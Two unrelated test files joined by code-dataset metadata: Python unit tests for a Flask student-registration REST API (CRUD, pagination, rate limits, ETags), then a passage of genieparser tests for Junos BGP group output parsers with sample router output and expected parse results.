self.assertTrue(json['urls'] == [])
# create new
rv, json = self.client.post('/api/v1.0/classes/',
data={'name': 'algebra'})
self.assertTrue(rv.status_code == 201)
algebra_url = rv.headers['Location']
# get
rv, json = self.client.get(algebra_url)
self.assertTrue(rv.status_code == 200)
self.assertTrue(json['name'] == 'algebra')
self.assertTrue(json['url'] == algebra_url)
# create new
rv, json = self.client.post('/api/v1.0/classes/',
data={'name': 'lit'})
self.assertTrue(rv.status_code == 201)
lit_url = rv.headers['Location']
# get
rv, json = self.client.get(lit_url)
self.assertTrue(rv.status_code == 200)
self.assertTrue(json['name'] == 'lit')
self.assertTrue(json['url'] == lit_url)
# create bad
self.assertRaises(BadRequest, lambda:
self.client.post('/api/v1.0/classes/', data={}))
self.assertRaises(ValidationError, lambda:
self.client.post('/api/v1.0/classes/', data={'not-name': 'lit'}))
# modify
rv, json = self.client.put(lit_url, data={'name': 'lit2'})
self.assertTrue(rv.status_code == 200)
# get
rv, json = self.client.get(lit_url)
self.assertTrue(rv.status_code == 200)
self.assertTrue(json['name'] == 'lit2')
# get collection
rv, json = self.client.get('/api/v1.0/classes/')
self.assertTrue(rv.status_code == 200)
self.assertTrue(algebra_url in json['urls'])
self.assertTrue(lit_url in json['urls'])
self.assertTrue(len(json['urls']) == 2)
# delete
rv, json = self.client.delete(lit_url)
self.assertTrue(rv.status_code == 200)
# get collection
rv, json = self.client.get('/api/v1.0/classes/')
self.assertTrue(rv.status_code == 200)
self.assertTrue(algebra_url in json['urls'])
self.assertFalse(lit_url in json['urls'])
self.assertTrue(len(json['urls']) == 1)
def test_registrations(self):
# create new students
rv, json = self.client.post('/api/v1.0/students/',
data={'name': 'susan'})
self.assertTrue(rv.status_code == 201)
susan_url = rv.headers['Location']
rv, json = self.client.post('/api/v1.0/students/',
data={'name': 'david'})
self.assertTrue(rv.status_code == 201)
david_url = rv.headers['Location']
# create new classes
rv, json = self.client.post('/api/v1.0/classes/',
data={'name': 'algebra'})
self.assertTrue(rv.status_code == 201)
algebra_url = rv.headers['Location']
rv, json = self.client.post('/api/v1.0/classes/',
data={'name': 'lit'})
self.assertTrue(rv.status_code == 201)
lit_url = rv.headers['Location']
# register students to classes
rv, json = self.client.post('/api/v1.0/registrations/',
data={'student': susan_url,
'class': algebra_url})
self.assertTrue(rv.status_code == 201)
susan_in_algebra_url = rv.headers['Location']
rv, json = self.client.post('/api/v1.0/registrations/',
data={'student': susan_url,
'class': lit_url})
self.assertTrue(rv.status_code == 201)
susan_in_lit_url = rv.headers['Location']
rv, json = self.client.post('/api/v1.0/registrations/',
data={'student': david_url,
'class': algebra_url})
self.assertTrue(rv.status_code == 201)
david_in_algebra_url = rv.headers['Location']
# get registration
rv, json = self.client.get(susan_in_lit_url)
self.assertTrue(rv.status_code == 200)
self.assertTrue(json['student'] == susan_url)
self.assertTrue(json['class'] == lit_url)
# get collection
rv, json = self.client.get('/api/v1.0/registrations/')
self.assertTrue(rv.status_code == 200)
self.assertTrue(susan_in_algebra_url in json['urls'])
self.assertTrue(susan_in_lit_url in json['urls'])
self.assertTrue(david_in_algebra_url in json['urls'])
self.assertTrue(len(json['urls']) == 3)
# bad registrations
self.assertRaises(BadRequest, lambda:
self.client.post('/api/v1.0/registrations/', data={}))
self.assertRaises(ValidationError, lambda:
self.client.post('/api/v1.0/registrations/',
data={'student': david_url}))
self.assertRaises(ValidationError, lambda:
self.client.post('/api/v1.0/registrations/',
data={'class': algebra_url}))
self.assertRaises(ValidationError, lambda:
self.client.post('/api/v1.0/registrations/',
data={'student': david_url, 'class': 'bad-url'}))
self.assertRaises(ValidationError, lambda:
self.client.post('/api/v1.0/registrations/',
data={'student': david_url,
'class': algebra_url + '1'}))
db.session.remove()
# get classes from each student
rv, json = self.client.get(susan_url)
self.assertTrue(rv.status_code == 200)
susans_reg_url = json['registrations']
rv, json = self.client.get(susans_reg_url)
self.assertTrue(rv.status_code == 200)
self.assertTrue(susan_in_algebra_url in json['urls'])
self.assertTrue(susan_in_lit_url in json['urls'])
self.assertTrue(len(json['urls']) == 2)
rv, json = self.client.get(david_url)
self.assertTrue(rv.status_code == 200)
davids_reg_url = json['registrations']
rv, json = self.client.get(davids_reg_url)
self.assertTrue(rv.status_code == 200)
self.assertTrue(david_in_algebra_url in json['urls'])
self.assertTrue(len(json['urls']) == 1)
# get students for each class
rv, json = self.client.get(algebra_url)
self.assertTrue(rv.status_code == 200)
algebras_reg_url = json['registrations']
rv, json = self.client.get(algebras_reg_url)
self.assertTrue(rv.status_code == 200)
self.assertTrue(susan_in_algebra_url in json['urls'])
self.assertTrue(david_in_algebra_url in json['urls'])
self.assertTrue(len(json['urls']) == 2)
rv, json = self.client.get(lit_url)
self.assertTrue(rv.status_code == 200)
lits_reg_url = json['registrations']
rv, json = self.client.get(lits_reg_url)
self.assertTrue(rv.status_code == 200)
self.assertTrue(susan_in_lit_url in json['urls'])
self.assertTrue(len(json['urls']) == 1)
# unregister students
rv, json = self.client.delete(susan_in_algebra_url)
self.assertTrue(rv.status_code == 200)
rv, json = self.client.delete(david_in_algebra_url)
self.assertTrue(rv.status_code == 200)
# get collection
rv, json = self.client.get('/api/v1.0/registrations/')
self.assertTrue(rv.status_code == 200)
self.assertFalse(susan_in_algebra_url in json['urls'])
self.assertTrue(susan_in_lit_url in json['urls'])
self.assertFalse(david_in_algebra_url in json['urls'])
self.assertTrue(len(json['urls']) == 1)
# delete student
rv, json = self.client.delete(susan_url)
self.assertTrue(rv.status_code == 200)
# get collection
rv, json = self.client.get('/api/v1.0/registrations/')
self.assertTrue(rv.status_code == 200)
self.assertTrue(len(json['urls']) == 0)
def test_rate_limits(self):
self.app.config['USE_RATE_LIMITS'] = True
rv, json = self.client.get('/api/v1.0/registrations/')
self.assertTrue(rv.status_code == 200)
self.assertTrue('X-RateLimit-Remaining' in rv.headers)
self.assertTrue('X-RateLimit-Limit' in rv.headers)
self.assertTrue('X-RateLimit-Reset' in rv.headers)
self.assertTrue(int(rv.headers['X-RateLimit-Limit']) == int(rv.headers['X-RateLimit-Remaining']) + 1)
while int(rv.headers['X-RateLimit-Remaining']) > 0:
rv, json = self.client.get('/api/v1.0/registrations/')
self.assertTrue(rv.status_code == 429)
def test_pagination(self):
# create several students
rv, json = self.client.post('/api/v1.0/students/',
data={'name': 'one'})
self.assertTrue(rv.status_code == 201)
one_url = rv.headers['Location']
rv, json = self.client.post('/api/v1.0/students/',
data={'name': 'two'})
self.assertTrue(rv.status_code == 201)
two_url = rv.headers['Location']
rv, json = self.client.post('/api/v1.0/students/',
data={'name': 'three'})
self.assertTrue(rv.status_code == 201)
three_url = rv.headers['Location']
rv, json = self.client.post('/api/v1.0/students/',
data={'name': 'four'})
self.assertTrue(rv.status_code == 201)
four_url = rv.headers['Location']
rv, json = self.client.post('/api/v1.0/students/',
data={'name': 'five'})
self.assertTrue(rv.status_code == 201)
five_url = rv.headers['Location']
# get collection in pages
rv, json = self.client.get('/api/v1.0/students/?page=1&per_page=2')
self.assertTrue(rv.status_code == 200)
self.assertTrue(one_url in json['urls'])
self.assertTrue(two_url in json['urls'])
self.assertTrue(len(json['urls']) == 2)
self.assertTrue('total' in json['meta'])
self.assertTrue(json['meta']['total'] == 5)
self.assertTrue('prev' in json['meta'])
self.assertTrue(json['meta']['prev'] is None)
first_url = json['meta']['first'].replace('http://localhost', '')
last_url = json['meta']['last'].replace('http://localhost', '')
next_url = json['meta']['next'].replace('http://localhost', '')
rv, json = self.client.get(first_url)
self.assertTrue(rv.status_code == 200)
self.assertTrue(one_url in json['urls'])
self.assertTrue(two_url in json['urls'])
self.assertTrue(len(json['urls']) == 2)
rv, json = self.client.get(next_url)
self.assertTrue(rv.status_code == 200)
self.assertTrue(three_url in json['urls'])
self.assertTrue(four_url in json['urls'])
self.assertTrue(len(json['urls']) == 2)
next_url = json['meta']['next'].replace('http://localhost', '')
rv, json = self.client.get(next_url)
self.assertTrue(rv.status_code == 200)
self.assertTrue(five_url in json['urls'])
self.assertTrue(len(json['urls']) == 1)
rv, json = self.client.get(last_url)
self.assertTrue(rv.status_code == 200)
self.assertTrue(five_url in json['urls'])
self.assertTrue(len(json['urls']) == 1)
def test_cache_control(self):
client = TestClient(self.app, self.default_username,
self.default_password)
rv, json = client.get('/auth/request-token')
self.assertTrue(rv.status_code == 200)
self.assertTrue('Cache-Control' in rv.headers)
cache = [c.strip() for c in rv.headers['Cache-Control'].split(',')]
self.assertTrue('no-cache' in cache)
self.assertTrue('no-store' in cache)
self.assertTrue('max-age=0' in cache)
self.assertTrue(len(cache) == 3)
def test_etag(self):
# create two students
rv, json = self.client.post('/api/v1.0/students/',
data={'name': 'one'})
self.assertTrue(rv.status_code == 201)
one_url = rv.headers['Location']
rv, json = self.client.post('/api/v1.0/students/',
data={'name': 'two'})
self.assertTrue(rv.status_code == 201)
two_url = rv.headers['Location']
# get their etags
rv, json = self.client.get(one_url)
self.assertTrue(rv.status_code == 200)
one_etag = rv.headers['ETag']
rv, json = self.client.get(two_url)
self.assertTrue(rv.status_code == 200)
two_etag = rv.headers['ETag']
# send If-None-Match header
rv, json = self.client.get(one_url, headers={
'If-None-Match': one_etag})
self.assertTrue(rv.status_code == 304)
rv, json = self.client.get(one_url, headers={
'If-None-Match': one_etag + ', ' + two_etag})
self.assertTrue(rv.status_code == 304)
rv, json = self.client.get(one_url, headers={
'If-None-Match': two_etag})
self.assertTrue(rv.status_code == 200)
rv, json = self.client.get(one_url, headers={
'If-None-Match': two_etag + ', *'})
self.assertTrue(rv.status_code == 304)
# send If-Match header
rv, json = self.client.get(one_url, headers={
'If-Match': one_etag})
self.assertTrue(rv.status_code == 200)
rv, json = self.client.get(one_url, headers={
'If-Match': one_etag + ', ' + two_etag})
self.assertTrue(rv.status_code == 200)
rv, json = self.client.get(one_url, headers={
'If-Match': two_etag})
self.assertTrue(rv.status_code == 412)
rv, json = self.client.get(one_url, headers={
'If-Match': '*'})
self.assertTrue(rv.status_code == 200)
# change a resource
rv, json = self.client.put(one_url, data={'name': 'not-one'})
self.assertTrue(rv.status_code == 200)
# use stale etag
rv, json = self.client.get(one_url, headers={
'If-None-Match': one_etag})
self.assertTrue(rv.status_code == 200)
| 40.315217
| 109
| 0.573146
| 2,272
| 18,545
| 4.551056
| 0.069982
| 0.189555
| 0.112959
| 0.155319
| 0.837911
| 0.814217
| 0.771277
| 0.743037
| 0.727176
| 0.692263
| 0
| 0.024961
| 0.278458
| 18,545
| 459
| 110
| 40.40305
| 0.747777
| 0.033001
| 0
| 0.628242
| 0
| 0
| 0.118837
| 0.02303
| 0
| 0
| 0
| 0
| 0.440922
| 1
| 0.0317
| false
| 0.014409
| 0.017291
| 0
| 0.057637
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b7234751fada3e49671e5e58af192cb15feff614
| 61,004
|
py
|
Python
|
src/genie/libs/parser/junos/tests/test_show_bgp.py
|
noziwatele/genieparser
|
4d7a62a870b30dfc8e2a41bf1ad81218bca6f5e9
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/junos/tests/test_show_bgp.py
|
noziwatele/genieparser
|
4d7a62a870b30dfc8e2a41bf1ad81218bca6f5e9
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/junos/tests/test_show_bgp.py
|
noziwatele/genieparser
|
4d7a62a870b30dfc8e2a41bf1ad81218bca6f5e9
|
[
"Apache-2.0"
] | null | null | null |
# Python
import unittest
from unittest.mock import Mock
# ATS
from pyats.topology import Device
from pyats.topology import loader
# Metaparser
from genie.metaparser.util.exceptions import SchemaEmptyParserError
# junos show_ospf
from genie.libs.parser.junos.show_bgp import (ShowBgpGroupBrief,
ShowBgpGroupDetail,
ShowBgpGroupSummary)
class TestShowBgpGroupBrief(unittest.TestCase):
""" Unit tests for:
* show bgp group brief | no-more
"""
maxDiff = None
device = Device(name='aDevice')
empty_output = {'execute.return_value': ''}
golden_output = {'execute.return_value': '''
Group Type: Internal AS: 65171 Local AS: 65171
Name: Genie Index: 0 Flags: <Export Eval>
Export: [ (v4_WATARI && NEXT-HOP-SELF) ]
Options: <Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 1
10.189.5.253+179
inet.0: 0/682/682/0
Group Type: Internal AS: 65171 Local AS: 65171
Name: v6_Genie Index: 1 Flags: <Export Eval>
Export: [ (v6_WATARI && NEXT-HOP-SELF) ]
Options: <Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 1
2001:db8:223c:ca45::c+60268
inet6.0: 0/0/0/0
Group Type: Internal AS: 65171 Local AS: 65171
Name: v4_RRC_72_TRIANGLE Index: 2 Flags: <Export Eval>
Export: [ (ALL_out && v4_NEXT-HOP-SELF_hktGCS001) ]
Options: <Cluster Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 3 Established: 0
10.189.5.245+179
10.189.5.243+179
10.189.5.242+179
Group Type: Internal AS: 65171 Local AS: 65171
Name: v6_RRC_72_TRIANGLE Index: 3 Flags: <Export Eval>
Export: [ (ALL_out && v6_NEXT-HOP-SELF_hktGCS001) ]
Options: <Cluster Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 2 Established: 0
2001:db8:223c:ca45::7+179
2001:db8:223c:ca45::8
Group Type: Internal AS: 65171 Local AS: 65171
Name: v6_RRC_72_SQUARE Index: 4 Flags: <Export Eval>
Export: [ ALL_out ]
Options: <Cluster Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 2 Established: 0
2001:db8:223c:ca45::9
2001:db8:223c:ca45::a
Group Type: Internal AS: 65171 Local AS: 65171
Name: v4_RRC_72_SQUARE Index: 5 Flags: <Export Eval>
Export: [ ALL_out ]
Options: <Cluster Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 2 Established: 0
10.189.5.241+179
10.189.5.240
Group Type: Internal AS: 65171 Local AS: 65171
Name: v4_Kentik Index: 6 Flags: <Export Eval>
Export: [ v4_Kentik_NO-DEFAULT ]
Options: <Cluster Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 0
10.49.216.179
Group Type: Internal AS: 65171 Local AS: 65171
Name: v6_Kentik Index: 7 Flags: <Export Eval>
Export: [ v6_Kentik_NO-DEFAULT ]
Options: <Cluster Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 0
2001:db8:6be:89bb::1:140
Group Type: External Local AS: 65171
Name: sggjbb001 Index: 8 Flags: <Export Eval>
Export: [ (ALL_out && (NEXT-HOP-SELF && HKG-SNG_AddMED)) ]
Options: <Multihop Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 0
10.189.6.250
Group Type: External Local AS: 65171
Name: v6_sggjbb001 Index: 9 Flags: <Export Eval>
Export: [ (ALL_out && (NEXT-HOP-SELF && v6_HKG-SNG_AddMED)) ]
Options: <Multihop Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 0
2001:db8:5961:ca45::1
Group Type: External Local AS: 65171
Name: sjkGCS001-EC11 Index: 10 Flags: <Export Eval>
Export: [ ((LABELSTACK_O2B || HKG-EC_out) && (NEXT-HOP-SELF && HKG-EC_AddMED)) ]
Options: <Multihop Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 1
10.169.14.240+60606
inet.0: 682/684/684/0
inet.3: 2/2/2/0
Group Type: External Local AS: 65171
Name: v6_sjkGCS001-EC11 Index: 11 Flags: <Export Eval>
Export: [ (v6_HKG-EC_out && (NEXT-HOP-SELF && v6_HKG-EC_AddMED)) ]
Options: <Multihop Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 1
2001:db8:eb18:ca45::1+179
inet6.0: 0/0/0/0
Group Type: External Local AS: 65171
Name: obpGCS001-WC11 Index: 12 Flags: <Export Eval>
Export: [ (HKG-WC_out && (NEXT-HOP-SELF && HKG-WC_AddMED)) ]
Options: <Multihop Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 0
10.169.14.249
Group Type: External Local AS: 65171
Name: v6_obpGCS001-WC11 Index: 13 Flags: <Export Eval>
Export: [ (v6_HKG-WC_out && (NEXT-HOP-SELF && v6_HKG-WC_AddMED)) ]
Options: <Multihop Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 0
2001:db8:eb18:ca45::11
Groups: 14 Peers: 19 External: 6 Internal: 13 Down peers: 15 Flaps: 359
Table Tot Paths Act Paths Suppressed History Damp State Pending
inet.0
1366 682 0 0 0 0
inet.3
2 2 0 0 0 0
inet6.0
0 0 0 0 0 0
'''}
golden_parsed_output = {
"bgp-group-information": {
"bgp-group": [
{
"bgp-option-information": {
"bgp-options": "Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "(v4_WATARI && NEXT-HOP-SELF)",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"bgp-rib": [
{
"accepted-prefix-count": "682",
"active-prefix-count": "0",
"advertised-prefix-count": "0",
"name": "inet.0",
"received-prefix-count": "682"
}
],
"established-count": "1",
"group-flags": "Export Eval",
"group-index": "0",
"local-as": "65171",
"name": "Genie",
"peer-address": [
"10.189.5.253+179"
],
"peer-as": "65171",
"peer-count": "1",
"type": "Internal"
},
{
"bgp-option-information": {
"bgp-options": "Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "(v6_WATARI && NEXT-HOP-SELF)",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"bgp-rib": [
{
"accepted-prefix-count": "0",
"active-prefix-count": "0",
"advertised-prefix-count": "0",
"name": "inet6.0",
"received-prefix-count": "0"
}
],
"established-count": "1",
"group-flags": "Export Eval",
"group-index": "1",
"local-as": "65171",
"name": "v6_Genie",
"peer-address": [
"2001:db8:223c:ca45::c+60268"
],
"peer-as": "65171",
"peer-count": "1",
"type": "Internal"
},
{
"bgp-option-information": {
"bgp-options": "Cluster Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "(ALL_out && v4_NEXT-HOP-SELF_hktGCS001)",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "2",
"local-as": "65171",
"name": "v4_RRC_72_TRIANGLE",
"peer-address": [
"10.189.5.245+179",
"10.189.5.243+179",
"10.189.5.242+179"
],
"peer-as": "65171",
"peer-count": "3",
"type": "Internal"
},
{
"bgp-option-information": {
"bgp-options": "Cluster Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "(ALL_out && v6_NEXT-HOP-SELF_hktGCS001)",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "3",
"local-as": "65171",
"name": "v6_RRC_72_TRIANGLE",
"peer-address": [
"2001:db8:223c:ca45::7+179",
"2001:db8:223c:ca45::8"
],
"peer-as": "65171",
"peer-count": "2",
"type": "Internal"
},
{
"bgp-option-information": {
"bgp-options": "Cluster Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "ALL_out",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "4",
"local-as": "65171",
"name": "v6_RRC_72_SQUARE",
"peer-address": [
"2001:db8:223c:ca45::9",
"2001:db8:223c:ca45::a"
],
"peer-as": "65171",
"peer-count": "2",
"type": "Internal"
},
{
"bgp-option-information": {
"bgp-options": "Cluster Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "ALL_out",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "5",
"local-as": "65171",
"name": "v4_RRC_72_SQUARE",
"peer-address": [
"10.189.5.241+179",
"10.189.5.240"
],
"peer-as": "65171",
"peer-count": "2",
"type": "Internal"
},
{
"bgp-option-information": {
"bgp-options": "Cluster Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "v4_Kentik_NO-DEFAULT",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "6",
"local-as": "65171",
"name": "v4_Kentik",
"peer-address": [
"10.49.216.179"
],
"peer-as": "65171",
"peer-count": "1",
"type": "Internal"
},
{
"bgp-option-information": {
"bgp-options": "Cluster Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "v6_Kentik_NO-DEFAULT",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "7",
"local-as": "65171",
"name": "v6_Kentik",
"peer-address": [
"2001:db8:6be:89bb::1:140"
],
"peer-as": "65171",
"peer-count": "1",
"type": "Internal"
},
{
"bgp-option-information": {
"bgp-options": "Multihop Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "(ALL_out && (NEXT-HOP-SELF && HKG-SNG_AddMED))",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "8",
"local-as": "65171",
"name": "sggjbb001",
"peer-address": [
"10.189.6.250"
],
"peer-count": "1",
"type": "External"
},
{
"bgp-option-information": {
"bgp-options": "Multihop Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "(ALL_out && (NEXT-HOP-SELF && v6_HKG-SNG_AddMED))",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "9",
"local-as": "65171",
"name": "v6_sggjbb001",
"peer-address": [
"2001:db8:5961:ca45::1"
],
"peer-count": "1",
"type": "External"
},
{
"bgp-option-information": {
"bgp-options": "Multihop Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "((LABELSTACK_O2B || HKG-EC_out) && (NEXT-HOP-SELF && HKG-EC_AddMED))",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"bgp-rib": [
{
"accepted-prefix-count": "684",
"active-prefix-count": "682",
"advertised-prefix-count": "0",
"name": "inet.0",
"received-prefix-count": "684"
},
{
"accepted-prefix-count": "2",
"active-prefix-count": "2",
"advertised-prefix-count": "0",
"name": "inet.3",
"received-prefix-count": "2"
}
],
"established-count": "1",
"group-flags": "Export Eval",
"group-index": "10",
"local-as": "65171",
"name": "sjkGCS001-EC11",
"peer-address": [
"10.169.14.240+60606"
],
"peer-count": "1",
"type": "External"
},
{
"bgp-option-information": {
"bgp-options": "Multihop Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "(v6_HKG-EC_out && (NEXT-HOP-SELF && v6_HKG-EC_AddMED))",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"bgp-rib": [
{
"accepted-prefix-count": "0",
"active-prefix-count": "0",
"advertised-prefix-count": "0",
"name": "inet6.0",
"received-prefix-count": "0"
}
],
"established-count": "1",
"group-flags": "Export Eval",
"group-index": "11",
"local-as": "65171",
"name": "v6_sjkGCS001-EC11",
"peer-address": [
"2001:db8:eb18:ca45::1+179"
],
"peer-count": "1",
"type": "External"
},
{
"bgp-option-information": {
"bgp-options": "Multihop Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "(HKG-WC_out && (NEXT-HOP-SELF && HKG-WC_AddMED))",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "12",
"local-as": "65171",
"name": "obpGCS001-WC11",
"peer-address": [
"10.169.14.249"
],
"peer-count": "1",
"type": "External"
},
{
"bgp-option-information": {
"bgp-options": "Multihop Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "(v6_HKG-WC_out && (NEXT-HOP-SELF && v6_HKG-WC_AddMED))",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "13",
"local-as": "65171",
"name": "v6_obpGCS001-WC11",
"peer-address": [
"2001:db8:eb18:ca45::11"
],
"peer-count": "1",
"type": "External"
}
],
"bgp-information": {
"bgp-rib": [
{
"active-prefix-count": "682",
"damped-prefix-count": "0",
"history-prefix-count": "0",
"name": "inet.0",
"pending-prefix-count": "0",
"suppressed-prefix-count": "0",
"total-prefix-count": "1366"
},
{
"active-prefix-count": "2",
"damped-prefix-count": "0",
"history-prefix-count": "0",
"name": "inet.3",
"pending-prefix-count": "0",
"suppressed-prefix-count": "0",
"total-prefix-count": "2"
},
{
"active-prefix-count": "0",
"damped-prefix-count": "0",
"history-prefix-count": "0",
"name": "inet6.0",
"pending-prefix-count": "0",
"suppressed-prefix-count": "0",
"total-prefix-count": "0"
}
],
"down-peer-count": "15",
"external-peer-count": "6",
"flap-count": "359",
"group-count": "14",
"internal-peer-count": "13",
"peer-count": "19"
}
}
}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowBgpGroupBrief(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
obj.parse()
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowBgpGroupBrief(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output)
class TestShowBgpGroupDetail(unittest.TestCase):
""" Unit tests for:
* show bgp group detail | no-more
"""
maxDiff = None
device = Device(name='aDevice')
empty_output = {'execute.return_value': ''}
golden_output = {'execute.return_value': '''
Group Type: Internal AS: 65171 Local AS: 65171
Name: Genie Index: 0 Flags: <Export Eval>
Export: [ (v4_WATARI && NEXT-HOP-SELF) ]
Options: <Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 1
10.189.5.253+179
Route Queue Timer: unset Route Queue: empty
Table inet.0
Active prefixes: 0
Received prefixes: 682
Accepted prefixes: 682
Suppressed due to damping: 0
Advertised prefixes: 682
Group Type: Internal AS: 65171 Local AS: 65171
Name: v6_Genie Index: 1 Flags: <Export Eval>
Export: [ (v6_WATARI && NEXT-HOP-SELF) ]
Options: <Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 1
2001:db8:223c:ca45::c+60268
Route Queue Timer: unset Route Queue: empty
Table inet6.0
Active prefixes: 0
Received prefixes: 0
Accepted prefixes: 0
Suppressed due to damping: 0
Advertised prefixes: 0
Group Type: Internal AS: 65171 Local AS: 65171
Name: v4_RRC_72_TRIANGLE Index: 2 Flags: <Export Eval>
Export: [ (ALL_out && v4_NEXT-HOP-SELF_hktGCS001) ]
Options: <Cluster Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 3 Established: 0
10.189.5.245
10.189.5.243
10.189.5.242+179
Group Type: Internal AS: 65171 Local AS: 65171
Name: v6_RRC_72_TRIANGLE Index: 3 Flags: <Export Eval>
Export: [ (ALL_out && v6_NEXT-HOP-SELF_hktGCS001) ]
Options: <Cluster Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 2 Established: 0
2001:db8:223c:ca45::7+179
2001:db8:223c:ca45::8+179
Group Type: Internal AS: 65171 Local AS: 65171
Name: v6_RRC_72_SQUARE Index: 4 Flags: <Export Eval>
Export: [ ALL_out ]
Options: <Cluster Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 2 Established: 0
2001:db8:223c:ca45::9
2001:db8:223c:ca45::a+179
Group Type: Internal AS: 65171 Local AS: 65171
Name: v4_RRC_72_SQUARE Index: 5 Flags: <Export Eval>
Export: [ ALL_out ]
Options: <Cluster Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 2 Established: 0
10.189.5.241+179
10.189.5.240
Group Type: Internal AS: 65171 Local AS: 65171
Name: v4_Kentik Index: 6 Flags: <Export Eval>
Export: [ v4_Kentik_NO-DEFAULT ]
Options: <Cluster Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 0
10.49.216.179
Group Type: Internal AS: 65171 Local AS: 65171
Name: v6_Kentik Index: 7 Flags: <Export Eval>
Export: [ v6_Kentik_NO-DEFAULT ]
Options: <Cluster Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 0
2001:db8:6be:89bb::1:140
Group Type: External Local AS: 65171
Name: sggjbb001 Index: 8 Flags: <Export Eval>
Export: [ (ALL_out && (NEXT-HOP-SELF && HKG-SNG_AddMED)) ]
Options: <Multihop Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 0
10.189.6.250
Group Type: External Local AS: 65171
